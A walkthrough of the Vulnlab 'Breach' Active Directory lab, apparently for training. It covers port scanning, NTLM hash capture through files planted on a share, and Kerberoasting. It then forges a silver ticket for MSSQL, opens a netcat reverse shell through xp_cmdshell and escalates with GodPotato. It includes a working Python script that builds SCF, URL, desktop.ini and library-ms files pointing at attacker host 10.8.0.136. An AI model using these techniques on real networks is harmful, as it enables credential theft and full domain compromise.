Vulnlab - Breach
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-12 16:03:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-03-12T16:45:02+00:00; -20s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-12T16:06:32+00:00; -20s from scanner time.
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-11T16:03:04
| Not valid after: 2024-09-10T16:03:04
| MD5: 6bef15efd66e365df68a7dc73029cee7
|_SHA-1: 7fce3649341af1319d2092a07f42efd473427203
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-12T16:05:52+00:00
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Accessing SMB shares with null authentication, we can list the available shares.
From the share, we get three directories named after domain users.
We could also have enumerated domain users by brute-forcing RIDs with lookupsid.py.
We can try AS-REP roasting, but it shows no user with Kerberos pre-authentication disabled.
Coercing Authentication
In the share we have write access, so we can upload files into any folder other than the user directories (we have no read access there).
That lets us coerce an authentication: a file such as an SCF or LNK dropped in a folder makes Explorer resolve a UNC path to our host when a user browses it. Since it's not certain which file type will trigger on this client, we use ntlm_theft
to generate every supported type and upload them all.
python3 ./ntlm_theft.py --generate all --server 10.8.0.136 -f @a
With Responder (or a similar SMB listener) running on 10.8.0.136, we receive an NTLMv2 challenge/response for Julia.Wong as soon as the files are uploaded and browsed; it cracks with hashcat (mode 5600).
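To show what those uploaded files actually contain (the UNC path that makes Explorer reach out over SMB and send NTLM), here is an added example that is not ntlm_theft's code. It uses the attacker address from the writeup, 10.8.0.136; the share name, icon name and the `@a` basename are assumptions for illustration.

```python
"""Added example (not ntlm_theft's own code): build coercion files that make
Windows Explorer fetch an icon or location over SMB from the attacker host,
which is what triggers the outbound NTLM authentication.
Attacker IP is the one used in the writeup; share and icon names are assumed."""
import os
import sys

ATTACKER_IP = "10.8.0.136"


def coercion_files(attacker_ip: str, basename: str = "@a") -> dict:
    """Return {filename: content}. Every file carries a UNC path pointing at
    attacker_ip, so the client resolves it over SMB and sends an NTLM
    challenge/response to whatever is listening there (e.g. Responder)."""
    unc = f"\\\\{attacker_ip}\\share"      # \\10.8.0.136\share  (assumed share name)
    icon = unc + "\\icon.ico"              # assumed icon name
    return {
        # Shell Command File: Explorer loads IconFile when the folder is listed.
        f"{basename}.scf": (
            "[Shell]\r\nCommand=2\r\nIconFile=" + icon + "\r\n"
            "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
        ),
        # Internet shortcut: the icon is fetched from the UNC path on display.
        f"{basename}.url": (
            "[InternetShortcut]\r\nURL=" + unc + "\r\n"
            "IconIndex=1\r\nIconFile=" + icon + "\r\n"
        ),
        # Folder customisation file: Explorer reads IconResource for the folder.
        "desktop.ini": "[.ShellClassInfo]\r\nIconResource=" + icon + ",0\r\n",
        # Library file: Explorer enumerates the UNC location in <url>.
        f"{basename}.library-ms": (
            '<?xml version="1.0" encoding="UTF-8"?>\r\n'
            '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">\r\n'
            "<searchConnectorDescriptionList><searchConnectorDescription>\r\n"
            "<simpleLocation><url>" + unc + "</url></simpleLocation>\r\n"
            "</searchConnectorDescription></searchConnectorDescriptionList>\r\n"
            "</libraryDescription>\r\n"
        ),
    }


def write_files(outdir: str, files: dict) -> list:
    """Write the files with CRLF endings preserved; return the paths written."""
    os.makedirs(outdir, exist_ok=True)
    written = []
    for name, content in files.items():
        path = os.path.join(outdir, name)
        with open(path, "w", newline="") as fh:   # newline="" keeps the \r\n
            fh.write(content)
        written.append(path)
    return written


if __name__ == "__main__":
    ip = sys.argv[1] if len(sys.argv) > 1 else ATTACKER_IP
    for p in write_files("coerce_out", coercion_files(ip)):
        print(p)
```

Which type fires depends on the client's Windows build and on how the user opens the share, which is why the writeup generates all of them rather than guessing. desktop.ini is only honoured when its folder carries the system or read-only attribute, and all of these need the client to reach the attacker on 445/tcp.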
We already saw an svc_mssql account. The name suggests a service account with an SPN registered, so it is likely kerberoastable, and with Julia.Wong's credentials we can request its TGS:
crackmapexec ldap breach.vl -u 'julia.wong' -p 'password' --kerberoasting kerberoast.txt
We crack the TGS-REP hash with hashcat (mode 13100) to get svc_mssql's cleartext password.
With these credentials we can try logging in to the MSSQL service with mssqlclient.py,
but it fails with a login failure: svc_mssql runs the service but has no SQL login of its own.
Since we have the MSSQL service account's credentials, we can forge a silver ticket: a service ticket encrypted with svc_mssql's key whose PAC claims we are Administrator. The service decrypts it with its own key and trusts the PAC without asking the DC, so MSSQL maps us to a sysadmin login. ticketer.py needs the service account's NT hash and the domain SID (lookupsid.py prints the domain SID):
ticketer.py -nthash hash -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn 'MSSQL/breach.vl' administrator
Now we just need to enable xp_cmdshell, which is disabled by default: turn on show advanced options with sp_configure, then enable xp_cmdshell and RECONFIGURE (mssqlclient.py's enable_xp_cmdshell command does both steps).
Through xp_cmdshell we download and execute netcat to get a reverse shell as the MSSQL service account.
This account has SeImpersonatePrivilege enabled, which lets us impersonate the token of any user that authenticates to a named pipe we control, including SYSTEM.
Using GodPotato (which works on this Windows Server 2022 build) we escalate our privileges to SYSTEM.